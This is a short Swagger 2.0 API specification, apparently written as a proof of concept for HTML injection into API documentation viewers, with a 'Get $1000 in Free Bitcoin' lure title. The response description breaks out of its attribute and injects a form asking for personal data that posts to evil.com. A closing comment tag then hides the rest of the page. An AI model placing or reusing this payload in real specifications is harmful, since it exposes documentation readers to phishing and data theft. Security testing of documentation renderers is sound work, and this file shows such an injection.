 
swagger: '2.0'
info:
  title: Get $1000 in Free Bitcoin
  description: |
    Teste
paths:
  /Free Bitcoin (Click Here):
    get:
      responses:
        '200':
          description: No response was specified'">Enter with your personal data: <form action='https://evil.com'><input type='text'><input type='submit' value='Send'><!--
      tags:
        - Free Bitcoin
      operationId: findAccounts
      summary: Finds all accounts
